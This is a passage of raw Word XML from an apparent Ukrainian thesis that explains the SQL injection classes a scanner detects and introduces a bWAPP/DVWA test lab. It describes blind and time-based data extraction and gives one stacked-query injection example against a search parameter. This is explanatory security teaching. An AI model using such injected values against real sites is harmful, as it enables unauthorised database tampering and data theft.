          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ін’єкції і які заходи безпеки потрібно вжити, щоб усунути дану проблему.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A71E6" w14:textId="00FFC3F7" w:rsidR="002425F2" w:rsidRDefault="00CE1AA4" w:rsidP="002425F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Сканер, що вбудований в даний інструмент виявляє наступні класи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C59761" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>UNION query SQLi. Класичний варіант впровадження SQL-коду, коли у вразливий параметр передається вираз, що починається з «UNION ALL SELECT». Ця техніка спрацьовує, коли веб-додаток напряму повертає результат виводу команди SELECT на сторінку: з використанням циклу for або схожим способом, так що кожен запис отриманої із БД вибірки послідовно виводиться на сторінку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4D3143" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Error-based SQLi. У випадку цієї атаки сканер заміняє або добавляє у вразливий параметр синтаксично неправильний вираз, потім парсить HTTP-відповідь (заголовки і тіло) в пошуку помилок DBMS, в яких поміщувалась заздалегідь відома послідовність символів і поряд вивід на наш підзапит. Ця техніка працює лиш тоді, коли веб-додаток з якихось причин (найчастіше в цілях відкладки) відкриває помилки DBMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67CD0C" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Stacked queries SQLi.  Сканер перевіряє, чи підтримує веб-додаток послідовні запити, і, якщо вони виконуються, додає в уразливий параметр HTTP-запиту крапку з комою (;) і слідом наступний SQL-запит (search.php?title=1'; create database newdbms;-- '). Цей прийом в основному використовується для впровадження SQL-команд, відмінних від SELECT, наприклад для маніпуляції даними (за допомогою INSERT або DELETE). Ця техніка може привести до можливості читання/запису із файлової системи, а також виконанню команд в ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C325359" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Boolean-Based blind SQLi. Реалізація як її ще називають сліпої ін’єкції: дані в БД в «чистому» вигляді уразливим веб-додатком ніде не повертаються. Сканер додає в уразливий параметр HTTP-запиту синтаксично правильно складений вираз, що уміщує в собі підзапит SELECT. Для кожного отриманої HTTP-відповіді виконується порівняння headers/body сторінки із відповіддю на початковий запит – таким чином, утиліта може символ за символом визначити вивід впровадженого SQL-виразу. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B45F43" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Time-based blind SQLi. Так само як і в попередній ін’єкції, сканер «грає» з вразливим параметром. Но у даному випадку додає підзапит, який призводить до паузи в роботі DBMS на визначену кількість секунд (наприклад за допомогою команд SLEPP() або BENCHMARK(). Використовуючи дану особливість, сканер може символ за символом витягнути дані з БД, порівнюючи час відповіді на оригінальний запит і запит з впроваджуваним кодом. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0D8390" w14:textId="6CD6F87E" w:rsidR="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сканер вразливостей написаний на Python`e, це означає, що його можна запустити на будь-якій ОС. Єдина вимога – це встановлений в системі інтерпретатор пайтона.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07E7C6" w14:textId="77777777" w:rsidR="00484499" w:rsidRPr="00101F0F" w:rsidRDefault="00484499" w:rsidP="00101F0F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B9DCDC" w14:textId="2F6D6AB2" w:rsidR="00CE1AA4" w:rsidRPr="00C0553F" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc30433151"/>
      <w:bookmarkStart w:id="115" w:name="_Toc516752158"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.2 Розгортання лабораторій для тестування</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="225A93CE" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00F86EBA" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E4FBF0" w14:textId="7C5564CE" w:rsidR="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дані лабораторії було розгорнуто в середовищі віртуалізації </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>VMware</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Workstation</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00484499">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на двох віртуальних машинах </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.04 і DVWA який розміщується на </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WampServer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, а той у свою чергу запускається під ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidR="00484499" w:rsidRPr="00484499">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1DF34" w14:textId="01E82A88" w:rsidR="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B450E3" w14:textId="1A8FF820" w:rsidR="00614A79" w:rsidRDefault="00614A79" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202E9E12" w14:textId="5249A1F7" w:rsidR="00614A79" w:rsidRDefault="00614A79" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD75E3D" w14:textId="77777777" w:rsidR="00614A79" w:rsidRPr="00F86EBA" w:rsidRDefault="00614A79" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFCD6DC" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00C0553F" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc516752159"/>
      <w:bookmarkStart w:id="117" w:name="_Toc30433152"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 Описання </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bee-box bwapp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB9143" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00F86EBA" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C907AEC" w14:textId="4636BE37" w:rsidR="00CE1AA4" w:rsidRPr="005B4CE1" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">bWAPP, або </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buggy</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис. 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>– це без</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>коштовний</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, з відкритим кодом, навмисно небезпечно написаний веб-додаток.</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC8A9CA" w14:textId="6277DC54" w:rsidR="00CE1AA4" w:rsidRPr="005B4CE1" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Даний додаток допомагає ентузіастам по безпеці, розробникам і студентам знаходити і передбачати веб-вразливості</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626A68B" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Уразливості в bWAPP. bWAPP охоплює всі вразливості із OWASP Top 10 project, включаючи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CFD538" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="225" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>iFrame</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
